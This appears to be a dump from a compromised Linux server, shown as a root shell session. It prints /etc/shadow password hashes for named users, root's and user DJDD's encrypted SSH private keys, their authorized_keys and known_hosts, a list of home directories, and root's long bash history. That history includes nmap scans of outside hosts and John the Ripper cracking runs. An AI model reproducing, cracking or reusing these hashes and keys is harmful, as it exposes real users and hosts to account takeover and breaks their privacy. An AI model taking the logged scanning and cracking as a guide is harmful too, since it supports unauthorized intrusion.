jindaronin:$1$wFQlwCxb$8FwV5ozNoK8bFNrWUzyuQ/:13521:0:99999:7:::
CdPirate:$1$Y4hU1v/.$32GupztmYa6UofeSh0x0N1:13558:0:99999:7:::
stax:$1$An/iKGlb$wWW.NaHBoHoxm4d7E76nB1:13593:0:99999:7:::
shoutcast:!!:13617:0:99999:7:::
brandonyu2000:$1$XZejQq6Z$QpO0cwpaHttp3G5bk90YU1:13649:0:99999:7:::
[root@localhost root]# cd .ssh
[root@localhost .ssh]# ls -alh
total 24K
drwx------ 2 root root 4.0K Sep 1 2006 .
drwxr-x--- 36 root root 4.0K May 6 18:14 ..
-rw------- 1 root root 736 Aug 5 2006 id_dsa
-rw-r--r-- 1 root root 616 Aug 5 2006 id_dsa.pub
-rw-r--r-- 1 root root 649 Apr 20 14:20 known_hosts
[root@localhost .ssh]# cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,4557364AE3A6EC0B
94u3QO/FyevHduz59L2gWFruixTN/C1Nb6/qiaVhCazOZNtTkgBN0gPQrhbzmjDe
V5tGIf6zDlGbk50o/yLTo2S6R9nRt0QZ8Uv6QgtuTTpiWY91oTnOqxIW31wcse0e
gvhGdJhCqApGtedespklruEJ+jff2lCdkNJgFU7ZP7gHO8XxnlorFEv0vXnLBz7r
P+87if9iQfy0TgwX0wBzl3JdzIK3piGwfAwp7XqY5QCqu7VaNcGIwn12FAeq3+vU
2w4tg5OgYpxR51TD4BfNO/he9VGIhNcLoUuTG7yQQEl/bG5wUAjLFxLZmGaV4Wbn
FY76yLeVFgL2lZnvr2bAkEBAv+biQVZ24qjnKkfNt/k14ivi+cduCVfRWpOjHHY3
hfSAFruMstbrmXumnPOW2mgm82ZlyyQEYvtjSS/aTXQ7QAz1k3Mqz1QSBVX2zD81
ggcGPNC2iQSJLvcp+CbuZ1dnX1DKpyeMCuJ8gPH7cel1wZadPXc4Rp5nHPoLvlGi
mBRSkVhaHN9PvA4+j8QGSEG6P0cC9P0dN6QTmnxUPrk8XLd1qGFbfkG1gb6v5o+J
ebf6IG+niQBBfyasESDcbw==
-----END DSA PRIVATE KEY-----
[root@localhost .ssh]# cat id_dsa.pub
ssh-dss AAAAB3NzaC1kc3MAAACBANt/aziEW4r+JKcAHb3KhZHl0T05eakskBCpk
GjXLv4PxQzuvISOCXciSrK3Ncdq4TShVd4WrO6XPRStEWSaXA4oyO0SIbbHaUxT+/
Xurbx8d7NBZfLvwTZrBDVpZ7ZmMeC1zh3s78Mk2C7Va8yJQCm2Nf+zBzucBVfUc0h
+fRndAAAAFQD4RVrG2TbDG2+C4hxs5CIrUHi76QAAAIAptgQu1r3UVJJGltER65LJ
c4d2cil516pftcricgfzK8OhTmFB1CMg/eu8LNJ6wbaP1TNo7IGrd8j9WdKuvN4JL
xetQATxdL6JIRfAp07EHH+fzA/Cc+GFGa8uNtcaRpZzTf6mDAbPZYRRRA/qzTzkZ2
MCQekLjEqfEH7AvulGIgAAAIAP5zQCV3aOLyCoah57oiOnqSrbYgcnMf11te4Kc1p
jtjI4OdSqKZAkj5o7+CwXMiMxZ2XdjEMJuL+eh8ZJYdqSP9OjsUgQoCNSgYarOc9F
RRaumXSq0YqezzmLWgEgo4+O5KPX/PDyWD4VJwL1DLE1Oyyrw5ugko3QKRRK+BjOk
g== root@localhost.localdomain
[root@localhost .ssh]# cat known_hosts
unitedti.org,208.186.100.154 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA
pywJffK7sb2FF+qbJyEtoD/zLNXj5HjbyabXmUE2fbubUGetiW9lwxDs4lcf0/dAH
OpGdc2CmUCSwKXFy+NLwMPdrhAsdfZPpGdghEe62YtVxJmnAo4mv41Ab+QjYJ4JG0
goBoV1Zi8hXNyjV1PQRQTNuYHikfRoJrfaXJj4sv4Crh+LfN2I0LjCTSHvBeinmRO
psE7gG9SpsQp4HQBEXlmPnEWzuyCxAWpPiRZsLV69NMH+b/cNe2nWl4sVngx3p8yt
310KMyCURHq+XCj84LL0H+wNgaExNTvSCjGQJr4dsnIq88Rwsjnuk8FCqBYWNuU/W
EChLZANHW9i2mbDIw==
irc.zloche.net,80.248.208.223 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIE
AzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDXZuiGVSNc/FyxIq6soDPhQ6nsYw3N
oKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRtQDibKXEmlquOTUNZzB0RQIKgI4FOl
pojpqTMziRUom2qChYoVBFLimYvH+b3fclaQaSichE=
[root@localhost .ssh]# cd ..
[root@localhost root]# cat .bash_history
locate php | grep -i mysql|less
iptables -I INPUT -s 67.159.26.70/32 -d 0/0 -j DROP
ps x
mysql -p -u gumbie
mysql -p -u sync
mysql -p -u sync
mysql -p -u gumbie
mysql -p -u gumbie
ps aux | grep mysqld
mysql -p -u gumbie
mysql -p -u gumbie mysql
grep nagios /var/log/*
grep nagios /var/log/* | grep -v crond
su - ircd
su ircd
cd /www/bin
ls
./apachectl start
cd /usr/local/mysql
ls
cd libexec
ls
./mysqld -u mysql &
mysqladmin shutdown -p
mysqladmin shutdown -p
service mysqld start
cd /dev
ls
mkdir /mnt/raid
mount /dev/sda1 /mnt/raid
yum install ntfs
yum --help
yum search ntfs
yum list
yum list ntfs
yum install kernel-module-ntfs
uname -r
cd /home/root
cd /root
ls
wget http://prdownloads.sourceforge.net/linux-ntfs/kernel-module-ntfs-2.6.11-1.1369_FC4-2.1.22-0.rr.6.0.i686.rpm
rpm -ihv kernel*
modprobe ntfs
mount /dev/sda1 /mnt/raid
cd /mnt/raid
ls
fsck
man fsck
umount /mnt/raid
cd ..
umount /mnt/raid
fsck /dev/sda1
yum install fsck.ntfs
man ntfsresize
yum install ntfsresize
ntfsfix
yum install ntfsfix
yum install ntfsprogs
wget http://ftp.belnet.be/packages/dries.ulyssis.org/fedora/fc4/i386/RPMS.dries/ntfsprogs-1.9.4-1.2.fc4.rf.i386.rpm
ls
rpm -ihv ntfs*
ntfsfix
ntfsfix /dev/sda1
mount /dev/sda1 /mnt/raid
cd /mnt/raid
ls
cd ..
man ntfsfix
man ntfsprogs
ntfsundelete /dev/sda1
umount /mnt/raid
ntfsundelete /dev/sda1
ntfsundelete /dev/sda1 --force
ntfsundelete /dev/sda1
chkdsk
man ntfsprogs
cat /dev/sda1
yum install w3m
w3m
w3m http://www.google.com
ls
cd /www/admin
ls
vi md.php
su ircd
cd /mnt
ls
smbmount \\\\RASTERING\\Music /mnt/Rasterized
smbmount \\\\RASTERING\\Hits /mnt/music
cd /www/admin
ls
vi md.php
exit
uname -a
su ircd
ls
cd /home/ircd/Unreal
ls
./unreal --help
./unreal restart
cat ircd.conf
ls
cat ircd.log
ls
users
./ircd --help
./unreal --help
./unreal stop
su ircd
ls
./ircd stop
./unreal stop
su ircd
shutdown -r now
shutdown cancel
shutdown -c
locate unrealircd.conf
ps auxww | grep mysql
service mysql start
service mysqld start
cd /home/ircd
ls
cd Unreal
su ircd
cd /mnt
ls
smbmount \\\\RASTERING\\Music /mnt/Rasterized
smbmount \\\\192.168.1.102\\Music /mnt/Rasterized
smbmount \\\\RASTERING\\Music /mnt/Rasterized
smbmount \\\\RASTERING\\Hits /mnt/music
cd /www/bin
ls
./apachectl start
services mysql start
service mysqld start
ls
cddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddccccccccccccccccc
cccccddddddddddddddddddddddddcccccccccccccccdddddddddddccccccccc
ccdddddddddddddcccccccddddddd
cd /mnt/music
ls
vi index.php
cd /root
ls
vi skeleton_bot.php
cd /www/htdocs/music
cd /www/htdocs/Music
ls
vi tumb.php
yum install libgd
cd /root
wget http://www.libgd.org/releases/gd-2.0.34.tar.gz
gzip -d gd*
man tar
man gzip
tar -xvf gd*
cd gd*
ls
./configure
yum install libpng
yum install libpng
yum install libjpeg
man convert
cd /www/htdocs/Music
ls
irssi
su ircd
nmap 81.95.148.250
telnet -p 22 81.95.148.250
telnet 81.95.148.250 22
telnet 81.95.148.250 21
su ircd
su ircd
ls
cd jtr
ls
cd john-1.7.2
ls
ls
cd /www/htdocs
ls
cd ../admin
;s
ls
cd ..
ls
cd raster
ls
cd mine
rm ./11-08-06_1555.jpg
ls -alh
ls -l
locate cisco
updatedb &
jobs
ps
w
locate john
cd jtr
cd run
ls
cd john-1.7.2/run/
.ls
ls
cat cisco.txt
cay pass.txt
cat pass.txt
jobs
cd ~
jobs
cat jtr/john-1.7.2/run/new.txt
locate cisco | grep "strayfe"
wall raster, are you here now?
cd jtr
ls
cd john*
ls
cd run
ls
vi cisco.txt
./john cisco.txt
irssi
su ircd
su ircd
cd /www/bin/
./apachectl start
su ircd
ps auxww | grep mysql
services mysqld start
service mysqld start
ps auxww | grep mysql
su ircd
cd /mnt
ls
smbmount \\\\192.168.1.102\\Music /mnt/Rasterized
ls
cd /dev
ls
tfpt
yum tftp
cd /
ls
cd /hlds
ls
nmap 192.168.100.1
exit
umount /mnt/Rasterized
umount /mnt/Hits
umount /mnt/hits
cd /mnt
ls
umount /mnt/music
smbmount \\\\192.168.1.102\\Hits /mnt/music
smbmount \\\\192.168.1.102\\Music /mnt/Rasterized
cd /
ls
cd home
ls
cd ..
ls
cd usr
ls
cd local
ls
cd /
ls
cd etc
ls
cd vsftpd
ls
cd /
ls
usr
cd usr
ls
cd local
ls
cd lib
ls
cd ..
ls
cd include
ls
cd ..
ls
cd /
ls
uname -r
cd home
ls
cd furryuser
yum install tftp
tftp 192.168.1.1
ftp 192.168.1.1
nmap 192.168.1.1
umount /mnt/music
umount /mnt/Rasterized
smbmount \\\\192.168.1.100\\Music /mnt/Rasterized
smbmount \\\\192.168.1.100\\Hits /mnt/music
ls
cd /
ls
cd /www/htdocs
ls
cd Music
ls
cd ../mp3
ls
cd /root
ls
vi skeleton_bot.php
cd /www/bin
./apachectl start
cd /mnt
l;s
ls
smbmount \\\\192.168.1.102\\Music /mnt/Rasterized
smbmount \\\\192.168.1.102\\Hits /mnt/music
exit
ifconfig
ifconfig eth1
ifconfig eth2
ifconfig eth3
ifconfig eth1
ifconfig eth0
ifconfig eth2
ifconfig
cd /home/ircd
ls
cd unreal
ls
cd Unreal
ls
su ircd
service mysqld start
su ircd
exit
cd /home/ircd/Unreal
lsw
ls
cd services
cd ~/services/
su ircd
adduser stax
passwd stax
emacs
vi /etc/sudoers
convert
man convert
color
colour
man fdisk
cd /www/htdocs
ls
cd ../admin
ls
cd ../raster
ls
cd ..
ls
cd htdocs
ls
cd mycrap
ls
cd ..
ls
ifconfig
route
man ifconfig
cd /etc
ls
cd /home/ircd/Unreal
su ircd
cat /etc/sudoers.conf
cat /etc/sudoers
cd /home/ircd/Unreal
ls
cd Sync
ls
vi aliases.conf
cd /www/admin
ls
wget http://doc.m0n0.ch/handbook-single/
ls
cd /mnt
ls
umount ./Rasterized
umount ./music
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
ping 192.168.38.254
ping 192.168.39.1
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
nslookup rasterized.net
nslookup 192.168.38.254
nslookup 192.168.38.254
nslookup 192.168.38.254
nslookup rastering
nslookup rastering
nslookup rastering.rasterized.net
nslookup rastering.rasterized.net
smbmount \\\\rastering.rasterized.net\\Music /mnt/Rasterized
smbmount \\\\rastering.rasterized.net\\Music /mnt/Rasterized
smbmount \\\\rastering.rasterized.net\\Music /mnt/Rasterized
smbmount \\\\rastering.rasterized.net\\Music /mnt/Rasterized
smbmount \\\\rastering.rasterized.net\\Hits /mnt/music
whois user-1120cdn.dsl.mindspring.com
whois mindspring.com
whois 66.32.49.183
cd /www/htdocs/Music
ls
calc
calculator
add
cd /boot
ls
cd grub
ls
su ircd
exit
cd /home/ircd
ls
cd Unreal
ls
./unreal stop
users
ps -a
ls
su ircd
cd ~ircd/
ls
cd services
rm ../services_STAX.tar
tar -cf ../services_STAX.tar ./
cd ..
ftp
ls
du -csh services_STAX.tar
ftp
nmap 64.79.213.12
nmap 64.79.213.12 -P0
whois 64.79.213.12
irssi
su ircd
cd /mnt
ls
umount /mnt/Raster
umount /mnt/Rasterized
umount /mnt/Music
umount /mnt/music
umount /mnt/music
umount /mnt/music
smbmount \\192.168.38.254\Hits /mnt/music
smbmount \\\\192.168.38.254\\Hits /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
umount /mnt/music
smbmount \\\\192.168.38.254\\Hits
smbmount \\\\192.168.38.254\\Hits /mnt/music
cd /mnt
ks
ls
smbmount \\\\192.168.38.254\\Hits /mnt/music
umount \\\\192.168.38.254\\Hits
umount /mnt/music
smbmount \\\\192.168.38.254\\Hits /mnt/music
umount /mnt/rasterized
cd /mnt
ls
umount /mnt/Rasterized
umount /mnt/music
smbmount \\\\192.168.38.254\\Hits /mnt/music
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
cd /www/htdocs/Music
ls
cd /mnt
ls
umount /mnt/Rasterized
umount /mnt/music
smbmount \\\\192.168.38.254\\Hits /mnt/music
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
cd /htdocs
cd /www/htdocs/
ls
cd ../admin
ls
ifconfig
ifconfig eth0 down
ifconfig eth0 dhcp up
dhclient eth0
quit
exit
ls
cd /home/ircd/Unreal
ls
irssi
cd /www/bin
./apachectl start
cd /mnt
lks
ls
smbmount \\\\192.168.38.254\\Hits /mnt/music
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
xls
xfs
kill xfs
cd /mnt
ls
cd Rasterized
ls
adduser shoutcast
cd /home/shoutcast
su shoutcast
quit
[12~
cd ./
ls
cd /
ls
cd hlds
ls
./hldsupdatetool.bin --help
cat readme.txt
./hldsupdatetool.bin -command update -game valve -dir ./valve
ls
./steam -command update -game valve -dir ./valve
./steam -command update -game cstrike -dir ./cstrike
cd ./valve
ls
./hlds_run -game valve
ls
cd valve
ls
vi server.cfg
vi autoexec.cfg
cd ..
./hlds_run -game valve
./hlds_run -game valve +ip rasterized.net +maxplayers 18
./hlds_run -game valve +ip 76.108.85.21 +maxplayers 18
./hlds_run -game valve +ip 76.108.85.21 +maxplayers 18 -debug
ls
cat debug.log
./hlds_run -game valve +ip 76.108.85.21 +maxplayers 18
./hlds_run -game valve +ip 76.108.85.21 +maxplayers 18
./hlds_run -game valve +maxplayers 18
./hlds_run -game valve +maxplayers 18
cd /mnt
ls
umount ./Rasterized
umount ./Rasterized
umount ./music
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Hits /mnt/music
cd /etc
ls
cd rc.d
ls
cd rc
cat rc
ls
cd init.d
ls
cd ..
cd /home/strayfe
ls
cd backups
ls
cd ~
ls
cd /mnt
umount ./music
umount ./Rasterized
umount ./Rasterized
umount ./Rasterized
umount ./Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Hits /mnt/music
cd /hlds
ls
cd valve
ls
./hlds_run -game valve +maxplayers 18
cd /www/htdocs
ls
cd source
ls
cd flashplayer
ls
cd /hlds/valve
ls
./hlds_run -game valve +maxplayers 18
/sbin/ipchains -A output -p udp -s $ANY 27012 -j ACCEPT
/sbin/ipchains -A output -p udp -s $ANY 27010 -j ACCEPT
/sbin/ipchains -A input -p udp -s $ANY 27015 -j ACCEPT
ipchains
./hlds_run -game valve +maxplayers 18 +ip 192.168.39.2
jtr
john
ls
cd jtr
ls
cd john*
ls
cd run
ls
vi hbh
./john hbh
nmap 71.235.127.228
netstat
cd /mnt
ls
ls ./Rasterized
umount ./Rasterized
umount ./music
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Hits /mnt/music
cd /www/htdocs
ls
traceroute
traceroute 192.168.100.1
cd /www/raster
vi index.php
ls
cd /etc
ls
ls -l rc
vim rc
grep -i "hostname" rc*
vim rc.sysinit
cd /mnt
ls
cd /media
ls
cd cdrom
ls
cd ../cdrecorder
ls
cd ../
cd /dev
ls
mount /dev/cdrom1 /media/cdrom
mount /dev/cdrom /media/cdrom
dmesg | tail
mount /dev/cdrom /media/cdrom
dmesg | tail
mount /dev/cdrom /media/cdrom
cd /media/cdrom
ls
cd ..
umount ./cdrom
cd /
ls
cd home]
cd home
ls
cd shoutcast
ls
cd shout
ls
su shoutcast
cd /www/htdocs
ls
vi index.php
rm index.php
vi index.php
cd /home/shoutcast/shout
ls
vi README.TXT
vi sc_serv.conf
cd /home/ircd
ls
cd Unreal
ls
vi ircd.conf
ls
cd Sync
ls
cd ..
ls
vi unrealircd.conf
cd /boot/grub
ls
cat grub.conf
cd /home
ls
whois 207.200.98.1
whois 65.214.44.71
cd /www/
ls
cd conf
ls
vi httpd.conf
cd ../bin
ls
./apachectl graceful'
./apachectl graceful
mount \\\\rastering.rasterized.net\\Music /mnt/rasterized
smbmount \\\\rastering.rasterized.net\\Music /mnt/rasterized
smbmount \\\\rastering.rasterized.net\\Music /mnt/Rasterized
smbmount \\\\192.168.28.254\\Music /mnt/Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
cd /mnt
ks
ls
umount /mnt/Rasterized
smbmount \\\\192.168.38.254\\Music /mnt/Rasterized
umount /mnt/music
smbmount \\\\192.168.38.254\\Hits /mnt/music
smbmount \\\\192.168.38.254\\Hits /mnt/music
cd /www/bin
./apachectl graceful
cd /www/conf
ls
vi httpd.conf
cd ../bin
./apachectl graceful
cd /www/raster
ls
rm ./*
y
vi index.php
adduser
adduser brandonyu2000
passwd brandonyu2000
cd /home/brandonyu2000
ls
mkdir public_html
ls
cd /www/conf
ls
vi httpd.conf
cd ../bin
ls
./apachectl graceful
cd /home/brandonyu
cd /home/brandonyu2000
ls
passwd brandonyu2000
cd /home
ls
cd /www
ls
cd htdocs
ls
cd mycrap
ls
cd ../
ls
cd info
ls
cd ..
ls
cd ..
ls
cd admin
ls
cd ..
ls
nmap 150.101.0.57
telnet 150.101.0.57:514
telnet 150.101.0.57 -p 514
telnet 150.101.0.57 514
uname
uname -s
uname -r
yum update kernel
uname -r
cd /boot/grub
ls
vi grub.conf
xs /
cd /
ls
cd /etc
ls
cd X11
ls
cd ../
ls
vi rc
vi /etc/inittab
man shutdown
shutdown -r now
ls /home
cat /etc/hosts.deny
iptables -L -n
host irc.rmachine.net
ifconfig
users
cd /www/bin
cd /mnt
ls
smbmount \\\\RASTERING\\Music Rasterized
smbmount \\\\RASTERING\\Hits Music
smbmount \\\\RASTERING\\Hits music
ls
cd /www/htdocs
ls
cd ../bin
ls
./apachectl start
cd /home/shoutcast
ls
cd shout
ls
su shoutcast
ifconfig
exit
ifconfig
ifconfig eth0 down
ifconfig eth0 dhcp up
ifconfig eth0 up
dhclient
ifconfig eth0
su ircd
exit
cd /www/htdocs/mp3
ls
cd ../Music
ls
cd /www/htdocs
ls
cd upload
ls
cd /etc
cat shadow
su Raster
ls
users
users
nmap janno.net
uname -r
cd /usr/src
ls
cd kernels
ls
cd ../
ls
cd redhat
ls
cd BUILD
ls
cd ..
ls
gcc --version
make --version
ld -v
fdformat --version
depmod -V
tune2fs
/sbin/lspci
cat /proc/cpuinfo
su ircd
su Raster
yum install ruby
cd /home/neon
ls
ls
cat pircbot.jar
ls
cat NeonBotMain.class
ls
ls
cat rubybot.rb
su ircd
cd /www/htdocs
ls
cd upload
ls
wget http://www4.1dawg.com/15876/its_the_main.flv
cd /www/htdocs/Music
ls
vi index.php
cd ../mp3
ls
vi index.php
vi index.php
cd ../Music
ls
su ircd
cd /www/htdocs
ls
cd upload
ls
cd files
ls
cd ../../
ls
cd ../admin
ls
su ircd
cd /www/bin
ls
./apachectl start
cd /home/ircd
ls
cd Unreal
ls
su ircd
cd /boot/grub
vi grub.conf
uname -r
cd ../
ls
cd /mnt
ls
smbmount \\\\RASTERING\\Music ./Rasterized
smbmount \\\\RASTERING\\Hits ./music
cd /usr/src/linux*
ls
mkinitrd
uname -rm
mkinitrd /boot/initrd-2.6.20_FC4.img.bak 2.6.20_FC4
cd /lib/modules/
ls
rename 2.6.20 2.6.20_FC4
ls
cp 2.6.20 2.6.20_FC4
ls
cp ./2.6.20 ./2.6.20_FC4
cd 2.6.20
ls
cd kernel
ls
ls
cd /
ls
uname
uname -rm
uname -r
cd /www/admin
ls
mkdir ebay
cd ebay
ls
cd /root
ls
cd john
ls
cd jtr
ls
cd john*
ls
cd run
ls
vi shopping
./john shopping
nmap www.shoppingbee.net
su ircd
su ircd
su ircd
su ircd
exit
irssi
su ircd
su - ircd
cd /etc/rc.d/init.d/
ls
ls -l *ntpd
ls -l ../*/*ntpd
less ntpd
cd ..
ls
pico rc.local
rdate -s time-a.nist.gov
date
date
w
w
cd
ps x
ps aux | grep ircd
su - ircd
su - ircd
su - ircd
su - ircd
ifconfig
dhclient
ifconfig
ls
ls
exit
cd /www/bin
./apachectl start
cd /mnt
smbmount \\\\RASTERING\\Music ./Rasterized
smbmount \\\\RASTERING\\Hits ./music
cd /home/ircd/
cd Unreal
ls
su ircd
users
[root@localhost root]# cd /home
[root@localhost home]# ls -alh
total 112K
drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 .
drwxr-xr-x 26 root root 4.0K Jun 5 18:30 ..
drwxr-xr-x 2 bartek bartek 4.0K Oct 23 2006 bartek
drwxr-xr-x 2 boost boost 4.0K Jan 22 00:14 boost
drwxr-xr-x 3 brandonyu2000 brandonyu2000 4.0K May 14 04:34 brandonyu2000
drwx------ 3 CdPirate CdPirate 4.0K Feb 15 17:45 CdPirate
drwxr-xr-x 2 deadlyacid deadlyacid 4.0K Jun 9 17:17 deadlyacid
drwxr-xr-x 15 10200 users 4.0K Sep 18 2006 dhcp-3.1.0a1
drwxr-x--x 4 DJDD DJDD 4.0K Nov 16 2006 DJDD
drwxr-xr-x 4 furryuser furryuser 4.0K Nov 27 2006 furryuser
drwxr-xr-x 15 gumbie gumbie 4.0K Jun 8 22:54 gumbie
drwxr-x--x 20 ircd ircd 4.0K Jun 8 15:15 ircd
drwxr-xr-x 2 jindaronin jindaronin 4.0K May 20 11:03 jindaronin
drwxrwxrwx 8 1000 users 4.0K Aug 4 2006 lirc-0.8.0
drwxr-xr-x 2 logan logan 4.0K Sep 17 2006 logan
drwxr-xr-x 2 mysql mysql 4.0K Jul 4 2006 mysql
drwxr-xr-x 2 neokat NeoKat 4.0K Sep 11 2006 NeoKat
drwxr-xr-x 3 neon neon 4.0K May 22 00:30 neon
drwxr-xr-x 14 Raster Raster 4.0K Jan 25 10:05 Raster
drwxr-xr-x 3 shoutcast shoutcast 4.0K May 7 15:07 shoutcast
drwxr-xr-x 2 root root 4.0K Aug 5 2006 .ssh
drwxr-xr-x 3 stax stax 4.0K Mar 31 17:55 stax
drwx------ 18 strayfe strayfe 4.0K Jun 7 18:19 strayfe
drwx------ 2 superman superman 4.0K Jul 27 2006 superman
drwxr-xr-x 2 Toad Toad 4.0K Nov 2 2006 Toad
drwxr-xr-x 2 wraith wraith 4.0K Aug 25 2006 wraithm
[root@localhost home]# cd .ssh
[root@localhost .ssh]# ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 5 2006 .
drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 ..
[root@localhost .ssh]# cd ../DJDD/
[root@localhost DJDD]# ls -alh
total 56K
drwxr-x--x 4 DJDD DJDD 4.0K Nov 16 2006 .
drwxr-xr-x 26 strayfe strayfe 4.0K May 14 04:32 ..
-rw------- 1 DJDD DJDD 4.2K Jun 8 10:51 .bash_history
-rw-r--r-- 1 DJDD DJDD 24 Oct 4 2006 .bash_logout
-rw-r--r-- 1 DJDD DJDD 191 Oct 4 2006 .bash_profile
-rw-r--r-- 1 DJDD DJDD 124 Oct 4 2006 .bashrc
-rw-r--r-- 1 DJDD DJDD 120 Oct 4 2006 .gtkrc
drwx------ 2 DJDD DJDD 4.0K May 25 11:55 .irssi
drwx------ 2 DJDD DJDD 4.0K Nov 9 2006 .ssh
-rw-rw-r-- 1 DJDD DJDD 693 Nov 9 2006 tmp
-rw------- 1 DJDD DJDD 882 Nov 9 2006 .viminfo
-rw-r--r-- 1 DJDD DJDD 658 Oct 4 2006 .zshrc
[root@localhost DJDD]# cd .ssh
[root@localhost .ssh]# ls -alh
total 24K
drwx------ 2 DJDD DJDD 4.0K Nov 9 2006 .
drwxr-x--x 4 DJDD DJDD 4.0K Nov 16 2006 ..
-rw-r--r-- 1 DJDD DJDD 611 Nov 9 2006 authorized_keys
-rw------- 1 DJDD DJDD 736 Nov 9 2006 id_dsa
-rw-r--r-- 1 DJDD DJDD 611 Nov 9 2006 id_dsa.pub
-rw-r--r-- 1 DJDD DJDD 1.5K Mar 21 15:22 known_hosts
[root@localhost .ssh]# cat authorized_keys
ssh-dss
AAAAB3NzaC1kc3MAAACBAI6Lc8yLa2rY9x0usKkIuF+KOrnNY9rXPb4QepTiCnT0
XeeO3xvp/U2UGKFNRwvVIVRvBnlQYxLjNyPLq5b7GyOWF1wheREiyDwwPn/Ei67i
3flFSEEigwStaYZyqUblyhGb8V+/zuM6IU0+fUyJ3njg2dYCzuS6EmxG6CEXwYmJ
AAAAFQCuVVp4oCYDMEhVcrba8Rp8MlDE8QAAAIA+pKsVtYmlcxOUhuMLGgiLyM2e
/eV7xaeLqFD3fxSog7XjtuTxJlb7TzJ8X0/q0mLtfk4n/+kRX7UJCfLmzOgcR9vu
ROUWwt4VU5Aw4iFf8OuPgT2y5SlnGKlSNupStubGNIVO+PNKR6aW82KzpRQXEkCY
DfFBJGlG5JQr2KLpKgAAAIBk3u6xP29pU92Qwg+5DJuE6L4kHHW2f1NPjoCFb1wO
cf2yi2V4eT8prKP+IFjqOfuCaTB+0fK/kWtX/vTA/lei3x19JKLHwY0+nMmnvvep
VBch5IrPyZQs4zyPFRxc7cWAgXdPETdrCZ/q5h4CI2qBvXQ2gfckFcaOZWwET13l
Nw==
djdd@vds349.sivit.org
[root@localhost .ssh]# cat id_dsa
-----BEGIN DSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,5A84045F7AE97BF5
OLpiQ4jAqNOvsx5EVaY5NtqAXYEhvy3z6AuL3dskW6WlgP4jCTykd2dTfcuY+7YV
HqhVI/izngdTgBVoz5xdsLwxPmXKYv7H6GBISHRzpAyq04XtI63a3lA2CIf+PKBV
m09LxyFAJ88t5j3X1V9E99pFCmVBkfjRDvIaKUbRhjWsATKh3Imm71OPqdZumA0q
3CGh0qEZW72I0l0xzBIUeEajfS3CSfxs2XOBeXLlG+eh1SmMdaS96R00pWiy4VCy
p/WBpQ9kDexlEfKPGNPpd4Stc9cZVNWb+2HXMXj6xriekcvSb30i/UrtJgVb9S+R
Xrhx4AC2XjCmw82KHvCqgrWN746deHdC22huP2n1Ig4mldhMrK6UqWNzavwJ/btv
nEMNn3r1hoQ8rhHn9PePeXOOxvc6D99vKhkI16RH0Ol+IXvyKPoqPJgaz8WGbvmC
rq3Brdt6iIa9/wPXLwB6bo7zPQ/uB3akg+s+e2laqWGuItvgcfurfJp9108WoFM0
y600xzfQxpOPqGzIjWa359O/v1opX1zviHjuI5NHUDOkKBoIXT8VZdAZr3SbGAMh
6td52Ps+2x3pdyYEiQx8NA==
-----END DSA PRIVATE KEY-----
[root@localhost .ssh]# cat id_dsa.pub
ssh-dss
AAAAB3NzaC1kc3MAAACBAI6Lc8yLa2rY9x0usKkIuF+KOrnNY9rXPb4QepTiCnT0
XeeO3xvp/U2UGKFNRwvVIVRvBnlQYxLjNyPLq5b7GyOWF1wheREiyDwwPn/Ei67i
3flFSEEigwStaYZyqUblyhGb8V+/zuM6IU0+fUyJ3njg2dYCzuS6EmxG6CEXwYmJ
AAAAFQCuVVp4oCYDMEhVcrba8Rp8MlDE8QAAAIA+pKsVtYmlcxOUhuMLGgiLyM2e
/eV7xaeLqFD3fxSog7XjtuTxJlb7TzJ8X0/q0mLtfk4n/+kRX7UJCfLmzOgcR9vu
ROUWwt4VU5Aw4iFf8OuPgT2y5SlnGKlSNupStubGNIVO+PNKR6aW82KzpRQXEkCY
DfFBJGlG5JQr2KLpKgAAAIBk3u6xP29pU92Qwg+5DJuE6L4kHHW2f1NPjoCFb1wO
cf2yi2V4eT8prKP+IFjqOfuCaTB+0fK/kWtX/vTA/lei3x19JKLHwY0+nMmnvvep
VBch5IrPyZQs4zyPFRxc7cWAgXdPETdrCZ/q5h4CI2qBvXQ2gfckFcaOZWwET13l
Nw==
djdd@vds349.sivit.org
[root@localhost .ssh]# cat known_hosts
www.liveits.com,80.248.208.223 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzYgpHj6TWctv9JPyCM/uWdHMWWgnMmR9KkDX
ZuiGVSNc/FyxIq6soDPhQ6nsYw3NoKEczB1aC6u1RMqueWyd0LLZD2QIVmJ1ijRt
QDibKXEmlquOTUNZzB0RQIKgI4FOlpojpqTMziRUom2qChYoVBFLimYvH+b3fcla
QaSichE=
zloche.com,81.93.5.180 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSbs8/VCyV0KAFHWmggnC3QHa2qh9AYdUYE4
OrbUK7oA4Ozq8D5V2GYhBmpkMvYcCENNi7cxyeTEMdEeBWok/zRcxRkGYAxM7Zg2
